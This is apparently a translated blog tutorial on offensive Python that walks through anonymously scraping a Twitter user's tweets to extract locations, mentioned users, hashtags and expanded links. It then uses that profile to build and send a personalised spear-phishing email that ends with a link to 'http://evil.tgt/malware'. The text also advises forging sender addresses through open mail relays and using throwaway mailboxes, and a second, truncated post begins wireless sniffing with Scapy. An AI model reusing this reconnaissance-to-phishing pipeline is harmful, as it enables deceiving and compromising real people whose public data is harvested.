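<p>Many Twitter users follow a formula when composing the tweets they share with the world. Typically the formula is: [the Twitter users the tweet is directed at] + [the body of the tweet, often containing a shortened URL] + [hashtags]. Read with malicious intent, the same formula becomes: [people who follow this user, and who are more likely to trust messages coming from them] + [a link or topic this person is interested in, which suggests interest in related content] + [a general direction or theme this person may want to learn more about].</p>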

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">quote_plus</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">get_tweets</span><span class="p">(</span><span class="n">handle</span><span class="p">):</span>
    <span class="n">query</span> <span class="o">=</span> <span class="n">quote_plus</span><span class="p">(</span><span class="s">"from:{} since:2009-01-01 include:retweets"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">tweets</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">anonymize</span><span class="p">()</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://search.twitter.com/search.json?q={}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">query</span><span class="p">))</span>
    <span class="n">json_objects</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">json_objects</span><span class="p">[</span><span class="s">"results"</span><span class="p">]:</span>
        <span class="n">new_result</span> <span class="o">=</span> <span class="p">{}</span>
        <span class="n">new_result</span><span class="p">[</span><span class="s">"from_user"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"from_user_name"</span><span class="p">]</span>
        <span class="n">new_result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span>
        <span class="n">new_result</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"text"</span><span class="p">]</span>
        <span class="n">tweets</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">new_result</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">tweets</span>

<span class="k">def</span> <span class="nf">load_cities</span><span class="p">(</span><span class="n">city_file</span><span class="p">):</span>
    <span class="n">cities</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">city_file</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">f</span><span class="p">:</span>
            <span class="c1"># strip() removes the line ending; split() would return a list, which has no lower()</span>
            <span class="n">city</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">().</span><span class="n">lower</span><span class="p">()</span>
            <span class="n">cities</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">city</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">cities</span>

<span class="k">def</span> <span class="nf">twitter_locate</span><span class="p">(</span><span class="n">tweets</span><span class="p">,</span> <span class="n">cities</span><span class="p">):</span>
    <span class="n">locations</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">loc_cnt</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">city_cnt</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">tweets_text</span> <span class="o">=</span> <span class="nb">str</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">tweet</span> <span class="ow">in</span> <span class="n">tweets</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
            <span class="n">locations</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">tweet</span><span class="p">[</span><span class="s">"geo"</span><span class="p">])</span>
            <span class="n">loc_cnt</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="c1"># Collect the text of every tweet, geotagged or not, for the city search</span>
        <span class="n">tweets_text</span> <span class="o">+=</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">].</span><span class="n">lower</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">city</span> <span class="ow">in</span> <span class="n">cities</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">city</span> <span class="ow">in</span> <span class="n">tweets_text</span><span class="p">:</span>
            <span class="n">locations</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">city</span><span class="p">)</span>
            <span class="n">city_cnt</span> <span class="o">+=</span> <span class="mi">1</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found {} locations via Twitter API and {} locations from text search."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">loc_cnt</span><span class="p">,</span> <span class="n">city_cnt</span><span class="p">))</span>
    <span class="k">return</span> <span class="n">locations</span>
</code></pre></div></div>
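
<p>The text-search half of twitter_locate can be exercised offline. A minimal sketch, assuming tweets are dictionaries with a "tweet" key as above; the function name find_cities and the sample data are hypothetical. It matches whole words rather than raw substrings, which is a deliberate change from the code above to avoid hits such as "paris" inside "comparison".</p>

```python
import re

def find_cities(tweets, cities):
    """Return the cities mentioned in the combined tweet text (sketch)."""
    # Join with spaces so words from adjacent tweets do not run together.
    text = " ".join(t["tweet"].lower() for t in tweets)
    found = []
    for city in cities:
        # \b anchors make the match apply to whole words only.
        if re.search(r"\b" + re.escape(city.lower()) + r"\b", text):
            found.append(city)
    return found

# Made-up sample data.
tweets = [
    {"tweet": "Landed in Boston this morning"},
    {"tweet": "A quick comparison of two libraries"},
]
print(find_cities(tweets, ["boston", "paris", "new york"]))
```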

<h3 id="用正则表达式解析-twitter-用户的兴趣爱好">Parsing a Twitter User's Interests with Regular Expressions</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">from</span> <span class="nn">urllib.request</span> <span class="kn">import</span> <span class="n">urlopen</span>

<span class="k">def</span> <span class="nf">find_interests</span><span class="p">(</span><span class="n">tweets</span><span class="p">):</span>
    <span class="n">interests</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">tweet</span> <span class="ow">in</span> <span class="n">tweets</span><span class="p">:</span>
        <span class="n">text</span> <span class="o">=</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="sa">r</span><span class="s">'(http.*?)\Z|(http.*?) '</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="c1"># findall returns one tuple per match; keep whichever group matched</span>
            <span class="k">if</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
            <span class="k">elif</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="c1"># Following the redirects reveals the full URL behind a short link</span>
                <span class="n">response</span> <span class="o">=</span> <span class="n">urlopen</span><span class="p">(</span><span class="n">link</span><span class="p">)</span>
                <span class="n">full_link</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">url</span>
                <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">full_link</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="sa">r</span><span class="s">"(@\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="sa">r</span><span class="s">"(#\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">interests</span>
</code></pre></div></div>
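
<p>The mention and hashtag patterns can be checked on a sample string without any network access. In this sketch the sample tweet and the name split_tweet are made up, and the link pattern is a simplified assumption (https?://\S+) rather than the one used above.</p>

```python
import re

MENTION = re.compile(r"@\w+")
HASHTAG = re.compile(r"#\w+")
LINK = re.compile(r"https?://\S+")  # simplified pattern, an assumption

def split_tweet(text):
    """Split one tweet into mentions, links and hashtags (sketch)."""
    return {
        "users": MENTION.findall(text),
        "links": LINK.findall(text),
        "hashtags": HASHTAG.findall(text),
    }

# Made-up sample following the mention + body + hashtag formula.
sample = "@alice worth reading http://example.com/x #python #security"
print(split_tweet(sample))
```

<p>Compiling the patterns once at module level avoids rebuilding them for every tweet, which is one reasonable way to structure this.</p>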

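<p>Because of the length limit on tweets, most URLs are shortened through one of several services. Short links carry little information, since they can point anywhere. To expand a short URL into the full one, open it with urllib2 (urllib.request in Python 3); once the script has opened the page, the response object exposes the complete URL.</p>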

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_interests</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="n">interests</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">tweet</span> <span class="ow">in</span> <span class="bp">self</span><span class="p">.</span><span class="n">tweets</span><span class="p">:</span>
        <span class="n">text</span> <span class="o">=</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"(http.*?)\Z|(http.*?) "</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
            <span class="k">elif</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="c1"># Needs "import urllib.request" at module level (urllib2 in Python 2)</span>
                <span class="n">response</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">link</span><span class="p">)</span>
                <span class="n">full_link</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">url</span>
                <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">full_link</span><span class="p">)</span>
            <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span>
                <span class="k">pass</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="sa">r</span><span class="s">"(@\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="sa">r</span><span class="s">"(#\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
    <span class="c1"># Sort once, after every tweet has been processed</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">interests</span>
</code></pre></div></div>

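<h2 id="匿名电子邮件">Anonymous Email</h2>

<p>Compared with obtaining a permanent email address, a disposable mailbox is another good option. Ten Minute Mail provides exactly this kind of throwaway mailbox. An attacker can use such hard-to-trace email accounts to create social networking accounts.</p>

<h2 id="批量社工">Mass Social Engineering</h2>

<h3 id="使用-smtplib-给目标对象发邮件">Sending Email to the Target with smtplib</h3>

<p>Sending an email normally means opening a mail client, clicking the appropriate options, choosing New, and finally clicking Send. Behind the scenes, the mail client connects to the server, sometimes logs in, and submits the details: sender, recipient, and other required data.</p>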

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">smtplib</span>
<span class="kn">from</span> <span class="nn">email.mime.text</span> <span class="kn">import</span> <span class="n">MIMEText</span>
<span class="k">def</span> <span class="nf">send_mail</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="n">subject</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span>
    <span class="n">msg</span> <span class="o">=</span> <span class="n">MIMEText</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
    <span class="n">msg</span><span class="p">[</span><span class="s">"From"</span><span class="p">]</span> <span class="o">=</span> <span class="n">user</span>
    <span class="n">msg</span><span class="p">[</span><span class="s">"To"</span><span class="p">]</span> <span class="o">=</span> <span class="n">to</span>
    <span class="n">msg</span><span class="p">[</span><span class="s">"Subject"</span><span class="p">]</span> <span class="o">=</span> <span class="n">subject</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">smtp_server</span> <span class="o">=</span> <span class="n">smtplib</span><span class="p">.</span><span class="n">SMTP</span><span class="p">(</span><span class="s">"smtp.gmail.com"</span><span class="p">,</span> <span class="mi">587</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Connecting To Mail Server."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">ehlo</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Starting Encrypted Session."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">starttls</span><span class="p">()</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">ehlo</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Logging Into Mail Server."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Sending Mail."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">sendmail</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="n">msg</span><span class="p">.</span><span class="n">as_string</span><span class="p">())</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Mail Sent Successfully."</span><span class="p">)</span>
    <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Sending Mail Failed."</span><span class="p">)</span>
        
<span class="n">user</span> <span class="o">=</span> <span class="s">"username"</span>
<span class="n">pwd</span> <span class="o">=</span> <span class="s">"password"</span>
<span class="n">send_mail</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">,</span> <span class="s">"target@target.target"</span><span class="p">,</span> <span class="s">"Re: Important"</span><span class="p">,</span> <span class="s">"Test Message"</span><span class="p">)</span>
</code></pre></div></div>
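
<p>Before involving a mail server at all, the message object can be built and inspected locally. A minimal sketch using only the standard library; the helper name build_message and the example.com addresses are placeholders, and nothing is sent.</p>

```python
from email.mime.text import MIMEText

def build_message(sender, recipient, subject, text):
    """Build a plain-text message and return it (nothing is sent)."""
    msg = MIMEText(text)
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    return msg

msg = build_message("me@example.com", "you@example.com", "Hello", "Test Message")
# as_string() yields the headers followed by the body, as passed to sendmail().
print(msg.as_string())
```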

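<p>However, many mail servers do not allow relaying, so they will only deliver mail to designated addresses. A local mail server can be configured to allow relaying, or to relay mail arriving from the Internet; it will then forward mail from any address to any address, even when the address is malformed. Forging the sender address is the key: use a mail client script together with a server that allows relaying.</p>

<h3 id="用-smtplib-进行网络钓鱼">Phishing with smtplib</h3>

<p>To lower the chance of being detected, only a very simple piece of text containing malicious code is generated and used as the message body. The program generates the text randomly from the data it holds. The steps are: choose a fake sender address, specify a subject, generate the body text, then send the email.</p>

<p>The script attacks the target using information they have left publicly accessible on Twitter. Based on the location information, @-mentioned users, hashtags, and links it finds about the target, the script generates and sends an email carrying a malicious link and waits for the target to click it.</p>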

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">smtplib</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">email.mime.text</span> <span class="kn">import</span> <span class="n">MIMEText</span>
<span class="kn">from</span> <span class="nn">twitterCLass</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">choice</span>
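<span class="k">def</span> <span class="nf">send_main</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="n">subject</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span>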
    <span class="k">pass</span>
    
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage%prog -u&lt;twitter target&gt; -t&lt;target email&gt; -l &lt;gmail login&gt; -p &lt;gmail password&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"handle"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify twitter handle"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-t"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"tgt"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target email"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-l"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"user"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify gmail login"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-p"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"pwd"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify gmail password"</span><span class="p">)</span>
    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">handle</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">handle</span>
    <span class="n">tgt</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">tgt</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">user</span>
    <span class="n">pwd</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">pwd</span>
    <span class="k">if</span> <span class="n">handle</span> <span class="o">==</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">tgt</span> <span class="o">==</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">user</span> <span class="o">==</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">pwd</span> <span class="o">==</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Fetching tweets from: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">spam_tgt</span> <span class="o">=</span> <span class="n">ReconPerson</span><span class="p">(</span><span class="n">handle</span><span class="p">)</span>
    <span class="n">spam_tgt</span><span class="p">.</span><span class="n">get_tweets</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Fetching interests from: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">interests</span> <span class="o">=</span> <span class="n">spam_tgt</span><span class="p">.</span><span class="n">find_interests</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Fetching location information from: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">location</span> <span class="o">=</span> <span class="n">spam_tgt</span><span class="p">.</span><span class="n">twitter_locate</span><span class="p">(</span><span class="s">"mlb-cities.txt"</span><span class="p">)</span>
    <span class="n">spam_msg</span> <span class="o">=</span> <span class="s">"Dear {},"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">tgt</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">location</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_loc</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">location</span><span class="p">)</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" Its me from {}."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rand_loc</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_user</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">])</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" {} said to say hello."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rand_user</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_hash</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">])</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" Did you see all the fuss about {}?"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rand_hash</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_link</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">])</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" I really liked your link to: {}."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rand_link</span><span class="p">)</span>
    <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" Check out my link to http://evil.tgt/malware"</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Sending Msg: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spam_msg</span><span class="p">))</span>
    <span class="n">send_main</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">,</span> <span class="n">tgt</span><span class="p">,</span> <span class="s">"Re: Important"</span><span class="p">,</span> <span class="n">spam_msg</span><span class="p">)</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="network" /><summary type="html"><![CDATA[Network Reconnaissance with Python]]></summary></entry><entry><title type="html">Wireless Network Attacks Using Python</title><link href="https://crabin.github.io/posts/2024/10/Wireless%20Network%20Attacks%20Using%20Python/" rel="alternate" type="text/html" title="Wireless Network Attacks Using Python" /><published>2024-10-05T00:00:00+00:00</published><updated>2024-10-05T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/10/Wireless%20Network%20Attacks%20Using%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/10/Wireless%20Network%20Attacks%20Using%20Python/"><![CDATA[<h2 id="用-python-进行无线网络攻击">Wireless Network Attacks Using Python</h2>

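<h2 id="搭建无线网络攻击环境">Setting Up a Wireless Attack Environment</h2>

<p>The default drivers on Backtrack 5 let the user put the wireless card into monitor mode and send raw data-link-layer frames directly. The adapter used here also has an extra connector that lets us attach a high-power antenna to the card.</p>

<p>Monitor mode gives you the raw wireless frames at the data link layer, rather than the <code class="language-plaintext highlighter-rouge">802.11</code> Ethernet frames you receive in managed mode. As a result, you can see beacon frames and wireless management frames even when you are not connected to any network.</p>

<h3 id="用-scapy-测试无线网卡的嗅探功能">Testing Wireless Capture with Scapy</h3>

<p>Use the <code class="language-plaintext highlighter-rouge">aircrack-ng</code> suite to put the card into monitor mode. First run <code class="language-plaintext highlighter-rouge">iwconfig</code> to list information about the wireless card wlan0, then run <code class="language-plaintext highlighter-rouge">airmon-ng start wlan0</code> to switch the card into monitor mode.</p>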

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># iwconfig wlan0</span>
</code></pre></div></div>

<p>Set the variable <code class="language-plaintext highlighter-rouge">conf.iface</code> to the newly created monitoring interface. For every packet captured, the script runs the <code class="language-plaintext highlighter-rouge">pkt_print</code> function, which prints a message when the packet is an <code class="language-plaintext highlighter-rouge">802.11</code> beacon, an <code class="language-plaintext highlighter-rouge">802.11</code> probe request, a TCP packet, or DNS traffic.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">pkt_print</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">):</span>
